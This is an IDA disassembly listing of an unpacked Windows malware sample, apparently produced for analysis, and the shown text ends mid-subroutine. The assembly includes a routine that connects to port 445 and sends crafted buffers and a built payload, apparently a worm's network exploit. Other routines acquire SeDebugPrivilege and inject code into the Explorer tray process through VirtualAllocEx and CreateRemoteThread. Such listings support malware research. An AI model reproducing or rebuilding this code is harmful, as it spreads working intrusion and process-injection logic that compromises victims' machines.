;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : AFAAE07C3FAEFF7CE84F1A0C9E17032E
; File Name : u:\work\afaae07c3faeff7ce84f1a0c9e17032e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; DATA XREF: sub_315028AE+90�r
dword_31501004 dd 77DEA122h ; DATA XREF: sub_315028AE+A2�r
dword_31501008 dd 77DEAB80h ; DATA XREF: sub_315028AE+C8�r
dword_3150100C dd 77DEA254h ; DATA XREF: sub_315028AE+DB�r
; sub_315028AE+FD�r
dword_31501010 dd 77DEA544h ; DATA XREF: sub_31502893+6�r
dword_31501014 dd 77DE8546h ; DATA XREF: sub_31502893+11�r
dword_31501018 dd 77DE7F96h ; DATA XREF: sub_3150283F+2�r
dword_3150101C dd 77DEA879h ; DATA XREF: sub_3150283F+41�r
dword_31501020 dd 77DDEAF4h ; DATA XREF: sub_3150243D+1A�r
dword_31501024 dd 77DDEBE7h ; DATA XREF: sub_3150243D+38�r
dword_31501028 dd 77DD7883h ; DATA XREF: sub_315023E4+3E�r
dword_3150102C dd 77DD761Bh ; DATA XREF: sub_315023AF+14�r
; sub_315023E4+1D�r
dword_31501030 dd 77DDEDE5h ; DATA XREF: sub_315023AF+24�r
dword_31501034 dd 77DD6BF0h ; DATA XREF: sub_315023AF+2D�r
; sub_315023E4+4E�r ...
dword_31501038 dd 77E34D78h ; DATA XREF: sub_31501D96+178�r
align 10h
dword_31501040 dd 7C830D74h, 7C80D262h ; DATA XREF: sub_31503722+14C�r
; sub_31503722:loc_31503968�r ...
dword_31501048 dd 7C8360DDh ; DATA XREF: sub_315029C7+4C�r
; sub_315029C7+14B�r
dword_3150104C dd 7C810D87h ; DATA XREF: sub_315029C7+F2�r
; sub_31503608+ED�r
dword_31501050 dd 7C80176Bh ; DATA XREF: sub_315028AE+10�r
; sub_31503371+A�r
dword_31501054 dd 7C810B1Ch ; DATA XREF: sub_315028AE+1E�r
dword_31501058 dd 7C809AE4h ; DATA XREF: sub_31502814+B�r
dword_3150105C dd 7C809A51h ; DATA XREF: sub_31502800+D�r
dword_31501060 dd 7C80B4CFh ; DATA XREF: sub_315026C2+17�r
dword_31501064 dd 7C80BAA1h ; DATA XREF: sub_315026C2+E9�r
dword_31501068 dd 7C814EEAh ; DATA XREF: sub_315025F6+1B�r
; sub_315029C7+3F�r ...
dword_3150106C dd 7C834D41h ; DATA XREF: sub_315025F6+40�r
; UPX0:31503448�r ...
dword_31501070 dd 7C8286EEh ; DATA XREF: sub_315025F6+71�r
dword_31501074 dd 7C86136Dh ; DATA XREF: sub_315025F6+B0�r
dword_31501078 dd 7C864B0Fh ; DATA XREF: sub_31503ABC�r
dword_3150107C dd 7C863DE5h ; DATA XREF: sub_31503AB6�r
dword_31501080 dd 7C801E16h ; DATA XREF: sub_31502490+9B�r
dword_31501084 dd 7C863F58h ; DATA XREF: sub_31503AB0�r
dword_31501088 dd 7C80BE01h ; DATA XREF: sub_31502277+13�r
; sub_315026C2+8F�r ...
dword_3150108C dd 7C8308ADh ; DATA XREF: sub_31501D96+2D�r
; sub_31502BE8+98�r
dword_31501090 dd 7C802520h ; DATA XREF: sub_31501D82+8�r
; sub_31502BE8+C2�r
dword_31501094 dd 7C831EABh ; DATA XREF: UPX0:31501D2A�r
; sub_315025F6+F�r
dword_31501098 dd 7C910331h ; DATA XREF: UPX0:31501D45�r
; sub_315028AE:loc_31502980�r ...
dword_3150109C dd 7C81CDDAh ; DATA XREF: UPX0:31501D54�r
; sub_315025F6+C3�r
dword_315010A0 dd 7C80BDB6h ; DATA XREF: sub_315011C0+253�r
; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; DATA XREF: sub_315011C0+16C�r
; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; DATA XREF: sub_315011C0+4F�r
; sub_315029C7+69�r ...
dword_315010AC dd 7C80DDF5h ; DATA XREF: sub_31501727+4D�r
dword_315010B0 dd 7C80ADA0h ; DATA XREF: sub_31501727+13�r
; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; DATA XREF: sub_31501727+D�r
; sub_31501D96+EC�r
dword_315010B8 dd 7C80220Fh ; DATA XREF: sub_315017AF+BC�r
dword_315010BC dd 7C809B47h ; DATA XREF: sub_315017AF+AA�r
; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; DATA XREF: sub_315017AF+8A�r
; sub_31502490+92�r
dword_315010C4 dd 7C80B6A1h ; DATA XREF: sub_315017AF+26�r
; UPX0:31501D1A�r
dword_315010C8 dd 7C80929Ch ; DATA XREF: sub_315018BA+12�r
; sub_315031EC+13�r ...
dword_315010CC dd 7C80E93Fh ; DATA XREF: sub_315018E8+8�r
dword_315010D0 dd 7C810637h ; DATA XREF: sub_315018F7+12�r
; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; DATA XREF: sub_31501962+38�r
dword_315010D8 dd 7C80A017h ; DATA XREF: sub_31501A48+13�r
; sub_31502B4C+1B�r
dword_315010DC dd 7C81320Ch ; DATA XREF: sub_31501A48+8�r
dword_315010E0 dd 7C80C058h ; DATA XREF: sub_31501A62+137�r
; sub_31501BA8+66�r ...
dword_315010E4 dd 7C809766h ; DATA XREF: sub_31501A62+F4�r
; sub_31502128+3F�r ...
dword_315010E8 dd 7C80180Eh ; DATA XREF: sub_31501BA8+92�r
dword_315010EC dd 7C810A77h ; DATA XREF: sub_31501BA8+6E�r
dword_315010F0 dd 7C801A24h ; DATA XREF: sub_31501BA8+57�r
; sub_315029C7+83�r ...
align 8
dword_315010F8 dd 77C1BF18h ; DATA XREF: sub_31503722+1F3�r
dword_315010FC dd 77C4CBE0h ; DATA XREF: sub_31503AAA�r
dword_31501100 dd 77C4D444h ; DATA XREF: sub_31503AA4�r
dword_31501104 dd 77C4CD34h ; DATA XREF: sub_31503A9E�r
; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A98�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31503A92�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31501110 dd 77C47660h ; DATA XREF: sub_31502CB7+37�r
; sub_31503722+B9�r
dword_31501114 dd 77C46030h ; DATA XREF: sub_31503A8C�r
dword_31501118 dd 77C46040h ; DATA XREF: sub_31503A86�r
; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A80�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; DATA XREF: sub_31501A62:loc_31501A93�r
; sub_31502490+79�r ...
dword_31501124 dd 77C371D3h ; DATA XREF: sub_31501932:loc_31501943�r
; sub_31501BA8:loc_31501C76�r ...
dword_31501128 dd 77C371BCh ; DATA XREF: sub_315018BA+22�r
; sub_31503371+5D�r
dword_3150112C dd 77C46F70h ; DATA XREF: sub_31503A44�r
dword_31501130 dd 77C478A0h ; DATA XREF: sub_31503A3E�r
dword_31501134 dd 77C475F0h ; DATA XREF: sub_31503A38�r
dd 0
dword_3150113C dd 7E41A8ADh ; DATA XREF: sub_315011C0+62�r
; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; DATA XREF: sub_315017AF+67�r
dword_31501144 dd 7E42DE87h ; DATA XREF: sub_315017AF+5D�r
dword_31501148 dd 7E418A80h ; DATA XREF: sub_315017AF+7A�r
align 10h
dword_31501150 dd 42C30BFAh ; DATA XREF: sub_31503608+A9�r
dword_31501154 dd 42C2C8A1h ; DATA XREF: sub_31503608+18�r
dword_31501158 dd 42C2ABF4h ; DATA XREF: sub_31503608+DB�r
dword_3150115C dd 42C367F6h ; DATA XREF: sub_31501A32+8�r
; UPX0:31502307�r
dd 0
dword_31501164 dd 71AB2DC0h ; DATA XREF: sub_315031EC+50�r
dword_31501168 dd 71AB2BC0h ; DATA XREF: sub_31501F6B+5B�r
dword_3150116C dd 71AB664Dh ; DATA XREF: sub_31501CEC+10�r
dword_31501170 dd 71AB3E00h ; DATA XREF: sub_31501BA8+100�r
; sub_31501F6B+7A�r ...
dword_31501174 dd 71AB88D3h ; DATA XREF: sub_31501BA8+10D�r
; sub_31501F6B+93�r ...
dword_31501178 dd 71AC1028h ; DATA XREF: sub_31501BA8+120�r
; sub_31501F6B+B5�r ...
dword_3150117C dd 71AB50C8h ; DATA XREF: sub_315019F3+C�r
dword_31501180 dd 71AB94DCh ; DATA XREF: sub_315019F3+17�r
dword_31501184 dd 71AB2BF4h ; DATA XREF: sub_315019B8+7�r
dword_31501188 dd 71AB4FD4h ; DATA XREF: sub_315019B8+1E�r
; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; DATA XREF: sub_315011C0+2B�r
; sub_31501BA8+AC�r ...
dword_31501190 dd 71AB3F41h ; DATA XREF: sub_315011C0+44�r
; sub_31502277+D�r
dword_31501194 dd 71AB2B66h ; DATA XREF: sub_315011C0+147�r
; sub_31501BA8+F0�r ...
dword_31501198 dd 71AB406Ah ; DATA XREF: sub_315011C0+15D�r
; sub_31502DEC+46�r
dword_3150119C dd 71AB428Ah ; DATA XREF: sub_315011C0+17B�r
; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; DATA XREF: sub_315011C0+1A4�r
; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; DATA XREF: sub_315011C0+550�r
; sub_31501A62+128�r
dword_315011A8 dd 71AB9639h ; DATA XREF: sub_315011C0+559�r
; sub_31501A62+12F�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31501D96+5�o
dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_315020C4+36�p
; sub_31502128+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A50
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A44
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A44
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A3E
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A44
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A44
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A44
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A38
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A38
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A38
add esp, 0Ch
push offset byte_31505000
call dword_315010A0
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A44
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A44
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A44
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A44
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A44
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A44
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A44
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A38
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A44
push offset byte_31505000
call sub_31503A3E
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A44
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A44
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A44
add esp, 40h
push offset byte_31505000
call sub_31503A3E
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A44
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A38
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A38
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A44
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A44
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A44
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx
push edi
call esi
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D5A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D6E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506190
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144
test eax, eax
jnz short loc_31501824
call dword_31501140
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8
push ds:dword_31506164
call esi
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501BA8+B�p
; UPX0:31501D30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D3A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D96+145�p
; sub_31501D96+150�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501BA8+12C�p
; sub_31501D96+12B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0
push eax
call dword_315010BC
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F6B+26�p
; sub_315025F6+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029C7+16B�p
; sub_31503608+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A38
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi
push [ebp+var_10]
call esi
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DEC+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_315021B0+3E�p
; sub_31502277+7�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_315020C4+22�p
; sub_31502128+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D96+40�p
; sub_31501D96+4C�p ...
arg_0 = dword ptr 4
